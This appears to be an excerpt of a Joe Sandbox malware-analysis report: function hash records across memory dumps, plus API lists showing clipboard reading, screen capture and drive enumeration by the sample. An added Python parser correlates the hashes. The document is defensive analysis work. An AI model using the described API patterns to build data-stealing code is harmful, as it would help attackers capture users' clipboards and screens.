                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F211047465C3808BD318CF28DD8476EBBE2ABC6214F244A2CE5C117256C7B1950ACBA6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                                  • Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                                                  • Instruction ID: e09d5bf307a0b045afdbe3fc60d887dc792b3a760bd65483947f7b6fe7d306e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6701A26554D3C14BD7268F3494543EABBE19F97314F0948AEC0C15B192EB39814BC729
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                                  • Instruction ID: f074fafccfebdf1cf7610b1792b73c5b671d681905e2b6f7cb47e7d99d69f609
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CE09A38A101458FCB048F58C86267AB7B0EF0B304B14A469D982EB320E3389915C7AC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                                  • Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC
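Several of the records above carry the same Opcode ID in two different dumps (the image mapped at 00400000 and the Yara-matching region at 02160000) while their Instruction IDs differ. The following parser is an added example, not part of the Joe Sandbox report: it reads records in the report's own field layout, tolerates the extraction noise seen on this page (leading whitespace, the "Download File" link label glued to the Associated field), and lists Opcode IDs present in more than one dump. The sample text is constructed from a trimmed copy of three records on this page. The reading that a shared Opcode ID with a different Instruction ID indicates the same function at a different address (operand-independent versus operand-sensitive hash) is the author's interpretation of the field names, not something the report states.

```python
"""Parse Joe Sandbox per-function 'Similarity' records and correlate them
across memory dumps.  Added example; not code from the report or from Joe
Sandbox.  Sample input is constructed from trimmed records on this page."""
import re
from collections import defaultdict

SAMPLE = """
Memory Dump Source
  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
  • Instruction ID: 90e5ec283c13e40ca86116f3df06184d0fd8b45ee6d0545186c0b059323bae99
Memory Dump Source
  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
  • Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
Memory Dump Source
  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
  • Instruction ID: e09d5bf307a0b045afdbe3fc60d887dc792b3a760bd65483947f7b6fe7d306e6
"""

# "<bullet> Key: value" with optional leading whitespace; first colon ends the key.
FIELD_RE = re.compile(r"^\s*(?:•\s*)?([A-Za-z ]+?):\s*(.*?)\s*$")
LINK_RESIDUE = "Download File"   # HTML link label fused onto a value by extraction


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record in report field layout."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Memory Dump Source":        # record boundary
            cur = {"yara": False}
            records.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":              # flag line, no value
            cur["yara"] = True
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                            # 'Similarity', plugin name, etc.
        key, val = m.group(1), m.group(2)
        if val.endswith(LINK_RESIDUE):
            val = val[: -len(LINK_RESIDUE)].strip()
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            cur["offset"] = int(off.group(1), 16) if off else None
            cur["based_on_pe"] = "based on PE: true" in val
        cur[key] = val
    return records


def shared_functions(records):
    """Opcode IDs seen at more than one dump offset.

    'relocated' is True when the Instruction IDs differ, which (assumption)
    means the same opcode sequence with different operands, e.g. addresses.
    """
    by_opcode = defaultdict(list)
    for r in records:
        if r.get("Opcode ID"):
            by_opcode[r["Opcode ID"]].append(r)
    out = {}
    for opc, rs in by_opcode.items():
        offsets = sorted({r.get("offset") for r in rs})
        if len(offsets) > 1:
            out[opc] = {
                "offsets": offsets,
                "relocated": len({r.get("Instruction ID") for r in rs}) > 1,
                "yara_hit": any(r["yara"] for r in rs),
            }
    return out


if __name__ == "__main__":
    for opc, info in shared_functions(parse_records(SAMPLE)).items():
        print(opc[:16], [hex(o) for o in info["offsets"]], info)
```

Run it as a script to list the shared Opcode IDs; feed it the full "Similarity" section of a report (the whole text of this page, pasted into a file) to see every function that exists both in the mapped image and in the unpacked region. Functions seen only in the 02160000 region are candidates for code that has no counterpart in the on-disk image.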
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction ID: 0b7423ac5abb8a2f54ab9bd67f835f952775a4af48944817cdfa53311d588828
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E0E9346986C08FD318EB59DC6487D7377AF85308726542D805717E51DB74A86ACF0A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction ID: 58cc46bcf82375073cf9f1fccaf16fe49708fa4818baf961fe28f3b6e69b91e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D0A76158C7A10E57688D7894A087BFBF4E987516F18159EE4D1E7505D320EC028658
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction ID: b4d5876dbaadb47f9f5ad65dff3f7a46837e4539deee61aa2e4442b46f51b544
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5C04C69B6C4008A924CCB15AC5053562769BCB254715E029802A53255E2249467C94D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                                  • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                                  • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                                  • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                                  • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                                  • Instruction ID: 9ca23cb432bde1a05de5d33e8b270f16f5734af98b4d7fbb4d4ab31ec82b2115
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6415C7050C3818EE311EF78948831FBFE5AB92318F05096DE5DA86292D7B9C54CCBA7
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                                  • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                                  • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                                  • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DrivesLogical
                                                                                                                                                                                                                                                  • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                                                                                                                                                                  • API String ID: 999431828-351939610
                                                                                                                                                                                                                                                  • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                                  • Instruction ID: ac4f8ce3aab5b2b8f617ff33ccbee8af1ee55ceb7242ff7d826c92cd46e8b57c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC31E9B41493408FC310DF29C8A122BBBF2FFC1324F46981CE5964B620E7799946CF42
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 02196BF0
                                                                                                                                                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 02196C11
                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 02196C21
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 02196C28
                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 02196C37
                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02196C42
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 02196C4E
                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02196C71
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2843486406-0
                                                                                                                                                                                                                                                  • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                                  • Instruction ID: aeba686382dc3e3da61ee158c5a79e6fd115a1dc338c838dfb0e44fd20d838bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59A2290D77498048B67
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02185411
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                                                  • API String ID: 237503144-1023387988
                                                                                                                                                                                                                                                  • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                                  • Instruction ID: ef03160bd06b48036711eb55c0c8a85e7f3824f1c709bba52bb364c3a2d744fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6521063424C344AFE3148F65E88175FBBE1EBC6714F25C92CE5A85B282D775C80A8F86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02185B5B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                                                  • API String ID: 237503144-3817236508
                                                                                                                                                                                                                                                  • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                                  • Instruction ID: 8b254b6acaa2395fe82655cce99bb6884917186355b3d30da07be6f2b0969c57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31CDB0E443489FDB10DFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFA9